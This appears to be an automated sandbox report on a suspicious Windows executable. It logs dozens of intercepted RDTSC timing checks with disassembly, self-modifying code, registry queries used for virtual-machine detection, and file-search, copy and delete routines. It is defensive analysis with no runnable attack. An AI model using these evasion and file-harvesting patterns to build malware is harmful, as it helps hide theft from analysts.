                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE7AD second address: 12BE7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BE7B3 second address: 12BE7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C27E9 second address: 12C2809 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F39A52A77D9h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2809 second address: 12C2837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F39A52A2E5Fh 0x0000000b jmp 00007F39A52A2E5Ch 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007F39A52A2E8Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2837 second address: 12C283B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C2AFE second address: 12C2B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jno 00007F39A52A2E56h 0x0000000d popad 0x0000000e jns 00007F39A52A2E5Ch 0x00000014 popad 0x00000015 push esi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C3144 second address: 12C3158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7EF2 second address: 12C7EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7EF8 second address: 12C7EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7EFC second address: 12C7F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFB17 second address: 12CFB30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A77D5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFB30 second address: 12CFB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F39A52A2E5Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F39A52A2E63h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFDBE second address: 12CFE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F39A52A77DFh 0x0000000a pushad 0x0000000b jbe 00007F39A52A77C6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 push edi 0x00000016 jmp 00007F39A52A77D4h 0x0000001b push eax 0x0000001c ja 00007F39A52A77C6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CFF62 second address: 12CFF71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F39A52A2E56h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D00D2 second address: 12D00D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D00D6 second address: 12D00E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F39A52A2E5Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D00E8 second address: 12D0113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F39A52A77CCh 0x0000000b jmp 00007F39A52A77D0h 0x00000010 push esi 0x00000011 jg 00007F39A52A77C6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0263 second address: 12D0274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F39A52A2E56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0274 second address: 12D0284 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F39A52A77CEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D06B6 second address: 12D06C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jo 00007F39A52A2E56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D06C8 second address: 12D06DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F39A52A77C6h 0x00000008 jns 00007F39A52A77C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D06DB second address: 12D06EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F39A52A2E56h 0x0000000a jnl 00007F39A52A2E56h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D06EC second address: 12D06FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F39A52A77C6h 0x00000009 jg 00007F39A52A77C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0F94 second address: 12D0F9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0F9A second address: 12D0F9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0F9F second address: 12D0FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007F39A52A2E66h 0x00000011 jo 00007F39A52A2E56h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0FCE second address: 12D0FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0FD4 second address: 12D0FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0FDD second address: 12D0FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D6E76 second address: 12D6E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a je 00007F39A52A2E56h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D6E87 second address: 12D6E9D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F39A52A77C6h 0x00000009 jnp 00007F39A52A77C6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D6E9D second address: 12D6EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D9A4B second address: 12D9A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D9A51 second address: 12D9A57 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D9889 second address: 12D988D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D988D second address: 12D98C1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F39A52A2E56h 0x00000008 js 00007F39A52A2E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F39A52A2E62h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F39A52A2E5Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EA676 second address: 12EA6A5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F39A52A77D9h 0x00000008 jnp 00007F39A52A77CCh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EA6A5 second address: 12EA6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F39A52A2E60h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EA6BF second address: 12EA6C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12EA6C5 second address: 12EA6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F39A52A2E56h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12F96D0 second address: 12F96E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F39A52A77C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jc 00007F39A52A77C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13012A3 second address: 13012A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13016B7 second address: 13016CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A77D2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1301969 second address: 130196D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130196D second address: 1301971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1301AD7 second address: 1301AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E61h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F39A52A2E5Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1301C79 second address: 1301C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F39A52A77CBh 0x0000000a jmp 00007F39A52A77CEh 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13061D6 second address: 13061E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F39A52A2E56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13061E2 second address: 13061E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1305D10 second address: 1305D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1305D17 second address: 1305D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1305ED5 second address: 1305EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F39A52A2E5Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C472 second address: 130C476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 130C476 second address: 130C48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F39A52A2E62h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1313B2C second address: 1313B3A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F39A52A77C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1313B3A second address: 1313B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13110E6 second address: 13110EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 121B3DD second address: 121B3E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1320D09 second address: 1320D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F39A52A77C6h 0x0000000b jmp 00007F39A52A77CEh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F39A52A77D9h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jg 00007F39A52A77DEh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1320D4A second address: 1320D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F39A52A2E62h 0x00000009 jmp 00007F39A52A2E5Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1332386 second address: 13323A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jns 00007F39A52A77CCh 0x0000000d pop ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F39A52A77C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13323A3 second address: 13323A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133266B second address: 1332677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F39A52A77C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1332677 second address: 133267B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133267B second address: 1332688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1332688 second address: 133268D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133268D second address: 1332692 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1332DC6 second address: 1332DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1332DCA second address: 1332DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1332DD0 second address: 1332DDA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1332DDA second address: 1332DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1332DE0 second address: 1332DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133309B second address: 133309F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13360FF second address: 1336103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1336103 second address: 1336113 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F39A52A77C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push ebx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1336113 second address: 1336130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 nop 0x00000007 mov edx, 0A676104h 0x0000000c push 00000004h 0x0000000e mov dword ptr [ebp+122D1922h], ebx 0x00000014 push 6D5136CDh 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1336130 second address: 133613B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 133613B second address: 133613F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13392FF second address: 1339307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1338EA9 second address: 1338EC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F39A52A2E63h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59A02D3 second address: 59A031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F39A52A77CFh 0x00000009 adc al, 0000003Eh 0x0000000c jmp 00007F39A52A77D9h 0x00000011 popfd 0x00000012 mov ch, 71h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F39A52A77CAh 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59A031A second address: 59A031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59A031E second address: 59A0322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59A0322 second address: 59A0328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59A0328 second address: 59A032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125BF83 second address: 125BF87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 125BF87 second address: 125BF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 10A1CC9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 124C32F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 109F2F2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1275A8F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01248B89 rdtsc 0_2_01248B89
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00E538B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E54910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00E4DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00E4E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00E54570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00E4ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00E416D0
